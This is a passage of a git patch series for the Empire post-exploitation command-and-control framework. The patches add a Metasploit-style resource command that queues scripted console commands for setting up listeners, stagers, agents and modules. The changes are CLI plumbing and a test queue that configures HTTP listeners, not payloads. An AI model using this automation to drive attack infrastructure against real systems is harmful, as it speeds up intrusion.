From 000f81519d4a97e2eba3ab628b2ea76556ec039b Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 14:17:35 -0600 Subject: [PATCH 01/15] initial resource command working, but hard coded --- lib/common/empire.py | 72 +++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 71 insertions(+), 1 deletion(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 6d7aa5d..719f718 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -96,7 +96,7 @@ class MainMenu(cmd.Cmd): dispatcher.send('[*] Empire starting up...', sender="Empire") - + self.resourceQueue = [] # print the loading menu messages.loading() @@ -271,6 +271,9 @@ class MainMenu(cmd.Cmd): print " " + helpers.color(str(num_listeners), "green") + " listeners currently active\n" print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n" + if self.resourceQueue and len(self.resourceQueue) > 0: + self.cmdqueue = [self.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) @@ -377,10 +380,18 @@ class MainMenu(cmd.Cmd): # CMD methods ################################################### + def postcmd(self, stop, line): + if self.resourceQueue and len(self.resourceQueue) > 0: + self.cmdqueue = [self.resourceQueue.pop(0)] + + + def default(self, line): "Default handler." pass + def do_resource(self, line): + self.resourceQueue = ["listeners","uselistener http","set Name http81","set DefaultProfile some/default/profile,some/other,and/one/more", "set Host 1.2.3.4","set Port 81","info","execute","back","?","?","agents","back","listeners","uselistener http","set Name http82","set Port 82","execute","listeners","kill http81","kill http82"] def do_exit(self, line): "Exit Empire" @@ -391,6 +402,8 @@ class MainMenu(cmd.Cmd): "Jump to the Agents menu." try: agents_menu = AgentsMenu(self) + if self.resourceQueue and len(self.resourceQueue) > 0: + agents_menu.cmdqueue = [self.resourceQueue.pop(0)] agents_menu.cmdloop() except Exception as e: raise e @@ -400,6 +413,8 @@ class MainMenu(cmd.Cmd): "Interact with active listeners." try: listener_menu = ListenersMenu(self) + if self.resourceQueue and len(self.resourceQueue) > 0: + listener_menu.cmdqueue.append(self.resourceQueue.pop(0)) listener_menu.cmdloop() except Exception as e: raise e @@ -416,6 +431,8 @@ class MainMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self, parts[0]) + if self.resourceQueue and len(self.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -424,6 +441,8 @@ class MainMenu(cmd.Cmd): else: self.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self, parts[0]) + if self.resourceQueue and len(self.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in MainMenu's do_userstager()") @@ -441,6 +460,8 @@ class MainMenu(cmd.Cmd): else: try: module_menu = ModuleMenu(self, line) + if self.resourceQueue and len(self.resourceQueue) > 0: + module_menu.cmdqueue.append(self.resourceQueue.pop(0)) module_menu.cmdloop() except Exception as e: raise e @@ -921,6 +942,10 @@ class AgentsMenu(cmd.Cmd): def emptyline(self): pass + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + nextcmd = self.mainMenu.resourceQueue.pop(0) + self.cmdqueue = [nextcmd] def do_back(self, line): "Go back to the main menu." @@ -1283,6 +1308,8 @@ class AgentsMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -1291,6 +1318,8 @@ class AgentsMenu(cmd.Cmd): else: self.mainMenu.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in AgentsMenu's do_userstager()") @@ -1307,6 +1336,8 @@ class AgentsMenu(cmd.Cmd): else: # set agent to "all" module_menu = ModuleMenu(self.mainMenu, line, agent="all") + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -1419,9 +1450,13 @@ class AgentMenu(cmd.Cmd): if agentLanguage.lower() == 'powershell': agent_menu = PowerShellAgentMenu(mainMenu, sessionID) + if mainMenu.resourceQueue and len(mainMenu.resourceQueue) > 0: + agent_menu.cmdqueue.append(mainMenu.resourceQueue.pop(0)) agent_menu.cmdloop() elif agentLanguage.lower() == 'python': agent_menu = PythonAgentMenu(mainMenu, sessionID) + if mainMenu.resourceQueue and len(mainMenu.resourceQueue) > 0: + agent_menu.cmdqueue.append(mainMenu.resourceQueue.pop(0)) agent_menu.cmdloop() else: print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) @@ -1532,6 +1567,9 @@ class PowerShellAgentMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." @@ -1881,6 +1919,8 @@ class PowerShellAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -1989,6 +2029,8 @@ class PowerShellAgentMenu(cmd.Cmd): module.options['ProcessID']['Value'] = pid module_menu = ModuleMenu(self.mainMenu, 'powershell/code_execution/invoke_shellcode') + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() else: @@ -2046,6 +2088,8 @@ class PowerShellAgentMenu(cmd.Cmd): # jump to the spawn module module_menu = ModuleMenu(self.mainMenu, "powershell/management/spawn") + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() else: @@ -2331,6 +2375,9 @@ class PythonAgentMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." @@ -2679,6 +2726,8 @@ class PythonAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -2839,6 +2888,10 @@ class ListenersMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + nextcmd = self.mainMenu.resourceQueue.pop(0) + self.cmdqueue = [nextcmd] def do_agents(self, line): "Jump to the Agents menu." @@ -2893,6 +2946,8 @@ class ListenersMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -2901,6 +2956,8 @@ class ListenersMenu(cmd.Cmd): else: self.mainMenu.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in ListenerMenu's do_userstager()") @@ -2915,6 +2972,8 @@ class ListenersMenu(cmd.Cmd): print helpers.color("[!] Error: invalid listener module") else: listenerMenu = ListenerMenu(self.mainMenu, parts[0]) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + listenerMenu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) listenerMenu.cmdloop() @@ -3044,6 +3103,9 @@ class ListenerMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." @@ -3286,6 +3348,9 @@ class ModuleMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." @@ -3393,6 +3458,8 @@ class ModuleMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, line, agent=self.module.options['Agent']['Value']) + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -3655,6 +3722,9 @@ class StagerMenu(cmd.Cmd): "Go back a menu." return True + def postcmd(self, stop, line): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] def do_agents(self, line): "Jump to the Agents menu." From 083cffd27e55e7f8a2f9c1b565ee3e273240c4c8 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 14:42:43 -0600 Subject: [PATCH 02/15] cleaner code for resource files, but still hardcoded --- lib/common/empire.py | 70 +++++++++++++++++++++----------------------- 1 file changed, 33 insertions(+), 37 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 719f718..340579b 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -392,6 +392,7 @@ class MainMenu(cmd.Cmd): def do_resource(self, line): self.resourceQueue = ["listeners","uselistener http","set Name http81","set DefaultProfile some/default/profile,some/other,and/one/more", "set Host 1.2.3.4","set Port 81","info","execute","back","?","?","agents","back","listeners","uselistener http","set Name http82","set Port 82","execute","listeners","kill http81","kill http82"] + #self.resourceQueue = ["agents","?","?"] def do_exit(self, line): "Exit Empire" @@ -402,8 +403,6 @@ class MainMenu(cmd.Cmd): "Jump to the Agents menu." try: agents_menu = AgentsMenu(self) - if self.resourceQueue and len(self.resourceQueue) > 0: - agents_menu.cmdqueue = [self.resourceQueue.pop(0)] agents_menu.cmdloop() except Exception as e: raise e @@ -413,8 +412,6 @@ class MainMenu(cmd.Cmd): "Interact with active listeners." try: listener_menu = ListenersMenu(self) - if self.resourceQueue and len(self.resourceQueue) > 0: - listener_menu.cmdqueue.append(self.resourceQueue.pop(0)) listener_menu.cmdloop() except Exception as e: raise e @@ -431,8 +428,6 @@ class MainMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self, parts[0]) - if self.resourceQueue and len(self.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -441,8 +436,6 @@ class MainMenu(cmd.Cmd): else: self.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self, parts[0]) - if self.resourceQueue and len(self.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in MainMenu's do_userstager()") @@ -460,8 +453,6 @@ class MainMenu(cmd.Cmd): else: try: module_menu = ModuleMenu(self, line) - if self.resourceQueue and len(self.resourceQueue) > 0: - module_menu.cmdqueue.append(self.resourceQueue.pop(0)) module_menu.cmdloop() except Exception as e: raise e @@ -938,6 +929,10 @@ class AgentsMenu(cmd.Cmd): self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) self.stdout.write("\n") + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) def emptyline(self): pass @@ -1308,8 +1303,6 @@ class AgentsMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -1318,8 +1311,6 @@ class AgentsMenu(cmd.Cmd): else: self.mainMenu.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in AgentsMenu's do_userstager()") @@ -1336,8 +1327,6 @@ class AgentsMenu(cmd.Cmd): else: # set agent to "all" module_menu = ModuleMenu(self.mainMenu, line, agent="all") - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -1450,18 +1439,13 @@ class AgentMenu(cmd.Cmd): if agentLanguage.lower() == 'powershell': agent_menu = PowerShellAgentMenu(mainMenu, sessionID) - if mainMenu.resourceQueue and len(mainMenu.resourceQueue) > 0: - agent_menu.cmdqueue.append(mainMenu.resourceQueue.pop(0)) agent_menu.cmdloop() elif agentLanguage.lower() == 'python': agent_menu = PythonAgentMenu(mainMenu, sessionID) - if mainMenu.resourceQueue and len(mainMenu.resourceQueue) > 0: - agent_menu.cmdqueue.append(mainMenu.resourceQueue.pop(0)) agent_menu.cmdloop() else: print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) - class PowerShellAgentMenu(cmd.Cmd): """ The main class used by Empire to drive an individual 'agent' menu. @@ -1492,6 +1476,10 @@ class PowerShellAgentMenu(cmd.Cmd): # listen for messages from this specific agent dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any) + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) # def preloop(self): # traceback.print_stack() @@ -1919,8 +1907,6 @@ class PowerShellAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -2029,8 +2015,6 @@ class PowerShellAgentMenu(cmd.Cmd): module.options['ProcessID']['Value'] = pid module_menu = ModuleMenu(self.mainMenu, 'powershell/code_execution/invoke_shellcode') - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() else: @@ -2088,8 +2072,6 @@ class PowerShellAgentMenu(cmd.Cmd): # jump to the spawn module module_menu = ModuleMenu(self.mainMenu, "powershell/management/spawn") - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() else: @@ -2327,6 +2309,10 @@ class PythonAgentMenu(cmd.Cmd): if results: print "\n" + results.rstrip('\r\n') + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) # def preloop(self): # traceback.print_stack() @@ -2726,8 +2712,8 @@ class PythonAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) +## if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: +## module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -2865,6 +2851,11 @@ class ListenersMenu(cmd.Cmd): # display all active listeners on menu startup messages.display_active_listeners(self.mainMenu.listeners.activeListeners) + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) + # def preloop(self): # traceback.print_stack() @@ -2946,8 +2937,6 @@ class ListenersMenu(cmd.Cmd): elif len(parts) == 1: stager_menu = StagerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() elif len(parts) == 2: listener = parts[1] @@ -2956,8 +2945,6 @@ class ListenersMenu(cmd.Cmd): else: self.mainMenu.stagers.set_stager_option('Listener', listener) stager_menu = StagerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - stager_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) stager_menu.cmdloop() else: print helpers.color("[!] Error in ListenerMenu's do_userstager()") @@ -2972,8 +2959,6 @@ class ListenersMenu(cmd.Cmd): print helpers.color("[!] Error: invalid listener module") else: listenerMenu = ListenerMenu(self.mainMenu, parts[0]) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - listenerMenu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) listenerMenu.cmdloop() @@ -3091,6 +3076,10 @@ class ListenerMenu(cmd.Cmd): # set the text prompt self.prompt = '(Empire: ' + helpers.color("listeners/%s" % (listenerName), 'red') + ') > ' + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) def emptyline(self): """ @@ -3278,6 +3267,11 @@ class ModuleMenu(cmd.Cmd): except Exception as e: print helpers.color("[!] ModuleMenu() init error: %s" % (e)) + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) + # def preloop(self): # traceback.print_stack() @@ -3458,8 +3452,6 @@ class ModuleMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, line, agent=self.module.options['Agent']['Value']) - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -3684,6 +3676,10 @@ class StagerMenu(cmd.Cmd): listener = self.mainMenu.listeners.get_listener(listener) self.stager.options['Listener']['Value'] = listener + def cmdloop(self): + if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + cmd.Cmd.cmdloop(self) def validate_options(self): "Make sure all required stager options are completed." From 4bf47277e7d4ee429a7d218a2a4e4c95ff0553d5 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 15:45:07 -0600 Subject: [PATCH 03/15] using append instead of extend, and reading resource file --- lib/common/empire.py | 45 ++++++++++++++++++++++---------------------- 1 file changed, 22 insertions(+), 23 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index 340579b..4584aba 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -272,7 +272,7 @@ class MainMenu(cmd.Cmd): print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n" if self.resourceQueue and len(self.resourceQueue) > 0: - self.cmdqueue = [self.resourceQueue.pop(0)] + self.cmdqueue.append(self.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) @@ -382,7 +382,7 @@ class MainMenu(cmd.Cmd): def postcmd(self, stop, line): if self.resourceQueue and len(self.resourceQueue) > 0: - self.cmdqueue = [self.resourceQueue.pop(0)] + self.cmdqueue.append(self.resourceQueue.pop(0)) @@ -390,9 +390,10 @@ class MainMenu(cmd.Cmd): "Default handler." pass - def do_resource(self, line): - self.resourceQueue = ["listeners","uselistener http","set Name http81","set DefaultProfile some/default/profile,some/other,and/one/more", "set Host 1.2.3.4","set Port 81","info","execute","back","?","?","agents","back","listeners","uselistener http","set Name http82","set Port 82","execute","listeners","kill http81","kill http82"] - #self.resourceQueue = ["agents","?","?"] + def do_resource(self, arg): + self.resourceQueue = [] + with open(arg) as f: + self.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire" @@ -931,7 +932,7 @@ class AgentsMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) def emptyline(self): @@ -939,8 +940,7 @@ class AgentsMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - nextcmd = self.mainMenu.resourceQueue.pop(0) - self.cmdqueue = [nextcmd] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_back(self, line): "Go back to the main menu." @@ -1478,7 +1478,7 @@ class PowerShellAgentMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) # def preloop(self): @@ -1557,7 +1557,7 @@ class PowerShellAgentMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." @@ -2311,7 +2311,7 @@ class PythonAgentMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) # def preloop(self): # traceback.print_stack() @@ -2363,7 +2363,7 @@ class PythonAgentMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." @@ -2712,8 +2712,6 @@ class PythonAgentMenu(cmd.Cmd): print helpers.color("[!] Error: invalid module") else: module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID) -## if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: -## module_menu.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) module_menu.cmdloop() @@ -2853,7 +2851,7 @@ class ListenersMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) # def preloop(self): @@ -2880,9 +2878,10 @@ class ListenersMenu(cmd.Cmd): raise NavMain() def postcmd(self, stop, line): + print "in postcmd listeners" if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - nextcmd = self.mainMenu.resourceQueue.pop(0) - self.cmdqueue = [nextcmd] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) + print 6 def do_agents(self, line): "Jump to the Agents menu." @@ -3078,7 +3077,7 @@ class ListenerMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) def emptyline(self): @@ -3094,7 +3093,7 @@ class ListenerMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." @@ -3269,7 +3268,7 @@ class ModuleMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) # def preloop(self): @@ -3344,7 +3343,7 @@ class ModuleMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." @@ -3678,7 +3677,7 @@ class StagerMenu(cmd.Cmd): def cmdloop(self): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) def validate_options(self): @@ -3720,7 +3719,7 @@ class StagerMenu(cmd.Cmd): def postcmd(self, stop, line): if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue = [self.mainMenu.resourceQueue.pop(0)] + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) def do_agents(self, line): "Jump to the Agents menu." From 753c2e20de4c3b57cf17d57bf2062fdd13d34db2 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 15:53:32 -0600 Subject: [PATCH 04/15] added resource file functionality as in Metasploit --- lib/common/empire.py | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/lib/common/empire.py b/lib/common/empire.py index 4584aba..da7a7af 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -956,6 +956,10 @@ class AgentsMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." @@ -1618,6 +1622,10 @@ class PowerShellAgentMenu(cmd.Cmd): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Task agent to exit." @@ -2419,6 +2427,10 @@ class PythonAgentMenu(cmd.Cmd): agent = self.mainMenu.agents.get_agent_db(self.sessionID) messages.display_agent(agent) + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Task agent to exit." @@ -2892,6 +2904,10 @@ class ListenersMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." @@ -3109,6 +3125,10 @@ class ListenerMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." @@ -3359,6 +3379,10 @@ class ModuleMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." @@ -3735,6 +3759,10 @@ class StagerMenu(cmd.Cmd): "Go back to the main menu." raise NavMain() + def do_resource(self, arg): + self.mainMenu.resourceQueue = [] + with open(arg) as f: + self.mainMenu.resourceQueue.extend(f.read().splitlines()) def do_exit(self, line): "Exit Empire." From 16267f983c2a7f12364f500f744f7acf34e17461 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Thu, 12 Oct 2017 16:29:51 -0600 Subject: [PATCH 05/15] removed debug statements --- lib/common/empire.py | 4 ---- 1 file changed, 4 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index da7a7af..3dee134 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -2890,10 +2890,8 @@ class ListenersMenu(cmd.Cmd): raise NavMain() def postcmd(self, stop, line): - print "in postcmd listeners" if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: 